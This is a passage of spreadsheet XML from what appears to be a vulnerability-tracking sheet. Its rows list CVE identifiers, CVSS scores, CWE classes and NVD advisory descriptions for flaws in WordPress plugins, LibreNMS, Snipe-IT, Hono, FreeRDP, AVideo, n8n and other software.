          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84043</t>
        </is>
      </c>
      <c r="C5217" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5217" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5217" s="5" t="inlineStr"/>
      <c r="F5217" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5217" s="5" t="inlineStr"/>
      <c r="H5217" s="5" t="inlineStr"/>
      <c r="I5217" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5217" s="5" t="inlineStr"/>
      <c r="K5217" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L5217" s="5" t="inlineStr">
        <is>
          <t>The ePayco Payment Gateway for WooCommerce WordPress plugin before 8.4.7 does not properly verify the authenticity of payment confirmation requests, allowing unauthenticated attackers to mark orders as paid without a valid gateway signature.</t>
        </is>
      </c>
      <c r="M5217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84043</t>
        </is>
      </c>
    </row>
    <row r="5218">
      <c r="A5218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84044</t>
        </is>
      </c>
      <c r="C5218" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5218" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5218" s="5" t="inlineStr"/>
      <c r="F5218" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5218" s="5" t="inlineStr"/>
      <c r="H5218" s="5" t="inlineStr"/>
      <c r="I5218" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5218" s="5" t="inlineStr"/>
      <c r="K5218" s="5" t="inlineStr"/>
      <c r="L5218" s="5" t="inlineStr">
        <is>
          <t>The Restaurant Menu and Food Ordering WordPress plugin before 2.4.12 does not verify that a PayPal payment notification genuinely originates from PayPal, allowing unauthenticated attackers to forge a payment notification and mark their own order as paid and completed without making any payment.</t>
        </is>
      </c>
      <c r="M5218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84044</t>
        </is>
      </c>
    </row>
    <row r="5219">
      <c r="A5219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84045</t>
        </is>
      </c>
      <c r="C5219" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5219" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5219" s="5" t="inlineStr"/>
      <c r="F5219" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5219" s="5" t="inlineStr"/>
      <c r="H5219" s="5" t="inlineStr"/>
      <c r="I5219" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5219" s="5" t="inlineStr"/>
      <c r="K5219" s="5" t="inlineStr"/>
      <c r="L5219" s="5" t="inlineStr">
        <is>
          <t>The E-cab Taxi Booking Manager for Woocommerce WordPress plugin before 2.0.5 does not validate a client-supplied trip distance and base-price value on the server before pricing a booking, allowing unauthenticated attackers to manipulate the order total down to zero and place real taxi-booking orders at an arbitrary price.</t>
        </is>
      </c>
      <c r="M5219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84045</t>
        </is>
      </c>
    </row>
    <row r="5220">
      <c r="A5220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84062</t>
        </is>
      </c>
      <c r="C5220" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5220" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5220" s="5" t="inlineStr"/>
      <c r="F5220" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5220" s="5" t="inlineStr"/>
      <c r="H5220" s="5" t="inlineStr"/>
      <c r="I5220" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5220" s="5" t="inlineStr"/>
      <c r="K5220" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5220" s="5" t="inlineStr">
        <is>
          <t>BurgerEditor 3.0.0 through 3.4.0 contains an issue with authorization bypass through user-controlled key. If this vulnerability is exploited, the content of the page may be altered by an attacker who can log in to the product may be caused.</t>
        </is>
      </c>
      <c r="M5220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84062</t>
        </is>
      </c>
    </row>
    <row r="5221">
      <c r="A5221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84146</t>
        </is>
      </c>
      <c r="C5221" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5221" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5221" s="5" t="inlineStr"/>
      <c r="F5221" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5221" s="5" t="inlineStr"/>
      <c r="H5221" s="5" t="inlineStr"/>
      <c r="I5221" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5221" s="5" t="inlineStr"/>
      <c r="K5221" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5221" s="5" t="inlineStr">
        <is>
          <t>The Xpro Addons — 140+ Widgets for Elementor WordPress plugin before 1.7.8 does not perform any capability or post-status check before rendering a WooCommerce product summary from a supplied product identifier, allowing unauthenticated visitors to retrieve the title, price, SKU, description and stock details of products that are not publicly published (draft, pending, private or scheduled status).</t>
        </is>
      </c>
      <c r="M5221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84146</t>
        </is>
      </c>
    </row>
    <row r="5222">
      <c r="A5222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84191</t>
        </is>
      </c>
      <c r="C5222" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5222" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5222" s="5" t="inlineStr"/>
      <c r="F5222" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5222" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5222" s="5" t="inlineStr"/>
      <c r="I5222" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5222" s="5" t="inlineStr"/>
      <c r="K5222" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5222" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.5.0 contains stored cross-site scripting vulnerabilities in VRF display pages where mplsVpnVrfDescription, vrf_name, and mplsVpnVrfRouteDistinguisher fields from SNMP polling are rendered without sanitization. Attackers controlling a monitored network device can inject arbitrary JavaScript through SNMP responses that executes in the browser of any user viewing VRF-related pages.</t>
        </is>
      </c>
      <c r="M5222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84191</t>
        </is>
      </c>
    </row>
    <row r="5223">
      <c r="A5223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84206</t>
        </is>
      </c>
      <c r="C5223" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5223" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5223" s="5" t="inlineStr"/>
      <c r="F5223" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5223" s="5" t="inlineStr"/>
      <c r="H5223" s="5" t="inlineStr"/>
      <c r="I5223" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5223" s="5" t="inlineStr"/>
      <c r="K5223" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5223" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 gates the bulk asset restore endpoint on the assets.edit permission instead of assets.delete, allowing users without delete rights to restore soft-deleted assets. Attackers with edit permissions can post asset identifiers to the bulk restore endpoint to undo administrator deletions and bypass intended permission separation.</t>
        </is>
      </c>
      <c r="M5223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84206</t>
        </is>
      </c>
    </row>
    <row r="5224">
      <c r="A5224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84207</t>
        </is>
      </c>
      <c r="C5224" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5224" s="5" t="inlineStr"/>
      <c r="F5224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5224" s="5" t="inlineStr"/>
      <c r="H5224" s="5" t="inlineStr"/>
      <c r="I5224" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5224" s="5" t="inlineStr"/>
      <c r="K5224" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5224" s="5" t="inlineStr">
        <is>
          <t>Heym before 0.0.98 fails to apply SSRF egress guards to WebSocket Send and WebSocket Trigger nodes, allowing authenticated users to connect to internal services. Attackers can craft workflow nodes with arbitrary URLs and headers to reach internal services and read responses from the WebSocket Trigger node.</t>
        </is>
      </c>
      <c r="M5224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84207</t>
        </is>
      </c>
    </row>
    <row r="5225">
      <c r="A5225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84222</t>
        </is>
      </c>
      <c r="C5225" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5225" s="5" t="inlineStr"/>
      <c r="F5225" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5225" s="5" t="inlineStr"/>
      <c r="H5225" s="5" t="inlineStr"/>
      <c r="I5225" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5225" s="5" t="inlineStr"/>
      <c r="K5225" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5225" s="5" t="inlineStr">
        <is>
          <t>The Kirki  WordPress plugin before 6.3.0 does not check whether the requester is allowed to read a post before rendering and returning its page content, allowing unauthenticated users to retrieve the content of pages that are not publicly available, such as private, draft, pending and trashed ones.</t>
        </is>
      </c>
      <c r="M5225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84222</t>
        </is>
      </c>
    </row>
    <row r="5226">
      <c r="A5226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84364</t>
        </is>
      </c>
      <c r="C5226" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5226" s="5" t="inlineStr"/>
      <c r="F5226" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5226" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5226" s="5" t="inlineStr"/>
      <c r="I5226" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5226" s="5" t="inlineStr"/>
      <c r="K5226" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L5226" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.13.5, when parseBody() expands dot-separated form field names into nested objects with dot-notation parsing enabled, it does not limit the nesting depth or the total number of intermediate objects created. Empty segments are preserved, so one deeply dotted field name can encode one nesting level per byte, while a large number of shallowly dotted fields can create the same amplification across a request. A request body within a normal size limit can therefore allocate an object graph far larger than the request after the body has already been accepted. An unauthenticated attacker who can reach an affected endpoint can send concurrent requests that exhaust the JavaScript heap, terminate the server process, and leave the service unavailable until restart. Dot-notation parsing is not enabled by default, and applications using the default behavior are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="M5226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t>
        </is>
      </c>
    </row>
    <row r="5227">
      <c r="A5227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84379</t>
        </is>
      </c>
      <c r="C5227" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5227" s="5" t="inlineStr"/>
      <c r="F5227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5227" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5227" s="5" t="inlineStr"/>
      <c r="I5227" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5227" s="5" t="inlineStr"/>
      <c r="K5227" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L5227" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.11.0, FileField.render_headers() in src/httpx2/httpx2/_multipart.py directly interpolates attacker-controlled content_type values and custom headers from the files= three-element (filename, content, content_type) tuple and the files= four-element (filename, content, content_type, headers) tuple into multipart/form-data part headers without validating header names or values. CR or LF characters can terminate a part header, inject additional part headers, or end the part header block early, allowing a downstream multipart parser to treat attacker-supplied lines as genuine headers and potentially alter part semantics or bypass header-based checks. This issue is fixed in version 2.11.0.</t>
        </is>
      </c>
      <c r="M5227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t>
        </is>
      </c>
    </row>
    <row r="5228">
      <c r="A5228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84432</t>
        </is>
      </c>
      <c r="C5228" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5228" s="5" t="inlineStr"/>
      <c r="F5228" s="5" t="inlineStr"/>
      <c r="G5228" s="5" t="inlineStr"/>
      <c r="H5228" s="5" t="inlineStr"/>
      <c r="I5228" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5228" s="5" t="inlineStr"/>
      <c r="K5228" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5228" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9 through  9.5.2 did not validate an anti-CSRF token in the Boards custom slot dialog controller (concrete/controllers/dialog/board/custom_slot.php) saveTemplate() action. The action created a board_slot_proxy Block and dispatched an AddCustomSlotToBoardCommand against a board instance while gating only on the per-resource canEditBoardContents() permission, so a crafted cross-site request could cause a user holding board-edit permission with an active session to write attacker-chosen slot and template data to a board under their own authority. The state-changing database write completed before any downstream rendering, so the forged request succeeded even when the HTTP response returned a non-200 status. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.3 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting.</t>
        </is>
      </c>
      <c r="M5228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84432</t>
        </is>
      </c>
    </row>
    <row r="5229">
      <c r="A5229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84908</t>
        </is>
      </c>
      <c r="C5229" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5229" s="5" t="inlineStr"/>
      <c r="F5229" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5229" s="5" t="inlineStr"/>
      <c r="H5229" s="5" t="inlineStr"/>
      <c r="I5229" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5229" s="5" t="inlineStr"/>
      <c r="K5229" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5229" s="5" t="inlineStr">
        <is>
          <t>The WPFunnels plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 3.12.13. This is due to the plugin registering the 'wpfnl_load_payment' AJAX action for both authenticated and unauthenticated (wp_ajax_nopriv_) users and the underlying add_offer_product_to_cart() function performing no nonce verification, no capability check, and no validation that the attacker-supplied product_id is the offer product actually configured on the attacker-supplied step_id. This makes it possible for unauthenticated attackers to add arbitrary WooCommerce products to a cart at any discounted price configured on any funnel step, enabling price manipulation and revenue loss at checkout.</t>
        </is>
      </c>
      <c r="M5229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84908</t>
        </is>
      </c>
    </row>
    <row r="5230">
      <c r="A5230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84936</t>
        </is>
      </c>
      <c r="C5230" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5230" s="5" t="inlineStr"/>
      <c r="F5230" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5230" s="5" t="inlineStr"/>
      <c r="H5230" s="5" t="inlineStr"/>
      <c r="I5230" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5230" s="5" t="inlineStr"/>
      <c r="K5230" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5230" s="5" t="inlineStr">
        <is>
          <t>The EmbedPress  WordPress plugin before 4.6.4 does not have proper authorization on a public review-loading action, allowing unauthenticated users to force the site to make repeated billable third-party API requests using the site's own configured API key, and to create an unbounded number of attacker-controlled rows in the database.</t>
        </is>
      </c>
      <c r="M5230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84936</t>
        </is>
      </c>
    </row>
    <row r="5231">
      <c r="A5231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85037</t>
        </is>
      </c>
      <c r="C5231" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5231" s="5" t="inlineStr"/>
      <c r="F5231" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5231" s="5" t="inlineStr"/>
      <c r="H5231" s="5" t="inlineStr"/>
      <c r="I5231" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5231" s="5" t="inlineStr"/>
      <c r="K5231" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5231" s="5" t="inlineStr">
        <is>
          <t>The Sunshine Photo Cart  WordPress plugin before 3.7 does not validate that a client-supplied price identifier belongs to the item being purchased when it is added to the cart, allowing unauthenticated users to buy items at a lower price defined elsewhere on the site and complete an order at that price, resulting in financial loss for the site owner.</t>
        </is>
      </c>
      <c r="M5231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85037</t>
        </is>
      </c>
    </row>
    <row r="5232">
      <c r="A5232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85038</t>
        </is>
      </c>
      <c r="C5232" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5232" s="5" t="inlineStr"/>
      <c r="F5232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5232" s="5" t="inlineStr"/>
      <c r="H5232" s="5" t="inlineStr"/>
      <c r="I5232" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5232" s="5" t="inlineStr"/>
      <c r="K5232" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5232" s="5" t="inlineStr">
        <is>
          <t>The B2BKing — Ultimate WooCommerce B2B and Wholesale Plugin — Wholesale Prices, Bulk Order Form &amp; More WordPress plugin before 5.2.40 does not verify that a role selected during registration is one actually offered on the registration form, allowing unauthenticated users to assign themselves to restricted B2B customer groups and to skip the manual account-approval workflow during self-registration.</t>
        </is>
      </c>
      <c r="M5232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85038</t>
        </is>
      </c>
    </row>
    <row r="5233">
      <c r="A5233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85090</t>
        </is>
      </c>
      <c r="C5233" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5233" s="5" t="inlineStr"/>
      <c r="F5233" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5233" s="5" t="inlineStr"/>
      <c r="H5233" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I5233" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5233" s="5" t="inlineStr"/>
      <c r="K5233" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5233" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.31.0 contains a heap out-of-bounds read vulnerability in the general_ChromaV1ToYUV444 function during AVC444 chroma plane reconstruction. A malicious RDP server can craft a RFX_AVC444_BITMAP_STREAM with specific frame geometry to trigger an out-of-bounds memory read past the allocated luma plane.</t>
        </is>
      </c>
      <c r="M5233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85090</t>
        </is>
      </c>
    </row>
    <row r="5234">
      <c r="A5234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85158</t>
        </is>
      </c>
      <c r="C5234" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5234" s="5" t="inlineStr"/>
      <c r="F5234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5234" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5234" s="5" t="inlineStr"/>
      <c r="I5234" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5234" s="5" t="inlineStr"/>
      <c r="K5234" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5234" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in videoEmbeded.php that echoes the link parameter inside an HTML comment with zero escaping. Attackers can close the comment with --&gt; and inject arbitrary JavaScript that executes when victims visit the crafted embed URL.</t>
        </is>
      </c>
      <c r="M5234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85158</t>
        </is>
      </c>
    </row>
    <row r="5235">
      <c r="A5235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85159</t>
        </is>
      </c>
      <c r="C5235" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5235" s="5" t="inlineStr"/>
      <c r="F5235" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5235" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5235" s="5" t="inlineStr"/>
      <c r="I5235" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5235" s="5" t="inlineStr"/>
      <c r="K5235" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5235" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in userLogin.php where the cancelUri parameter is echoed in an href attribute after isSafeRedirectURL checks protocol only, not HTML characters. Unauthenticated attackers can inject event handlers via relative URLs with embedded quotes to execute arbitrary JavaScript when users interact with the Cancel button.</t>
        </is>
      </c>
      <c r="M5235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85159</t>
        </is>
      </c>
    </row>
    <row r="5236">
      <c r="A5236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85161</t>
        </is>
      </c>
      <c r="C5236" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5236" s="5" t="inlineStr"/>
      <c r="F5236" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5236" s="5" t="inlineStr"/>
      <c r="H5236" s="5" t="inlineStr"/>
      <c r="I5236" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5236" s="5" t="inlineStr"/>
      <c r="K5236" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5236" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a cross-site request forgery vulnerability in removePoster.php that lacks forbidIfNotPost or forbidIfInvalidToken checks. Attackers can craft malicious image tags to delete authenticated victims' live poster and thumbnail files via GET requests.</t>
        </is>
      </c>
      <c r="M5236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85161</t>
        </is>
      </c>
    </row>
    <row r="5237">
      <c r="A5237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85172</t>
        </is>
      </c>
      <c r="C5237" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5237" s="5" t="inlineStr"/>
      <c r="F5237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5237" s="5" t="inlineStr"/>
      <c r="H5237" s="5" t="inlineStr"/>
      <c r="I5237" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5237" s="5" t="inlineStr"/>
      <c r="K5237" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5237" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 2.34.1 contain a server-side request forgery vulnerability in the legacy request helper function exposed to Code and Function nodes. The validation logic checks the uri property for SSRF safety while the underlying HTTP client uses the url property when both are present, allowing attackers to bypass validation by supplying a safe uri alongside a malicious url to access internal addresses.</t>
        </is>
      </c>
      <c r="M5237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85172</t>
        </is>
      </c>
    </row>
    <row r="5238">
      <c r="A5238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85173</t>
        </is>
      </c>
      <c r="C5238" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5238" s="5" t="inlineStr">
        <is>
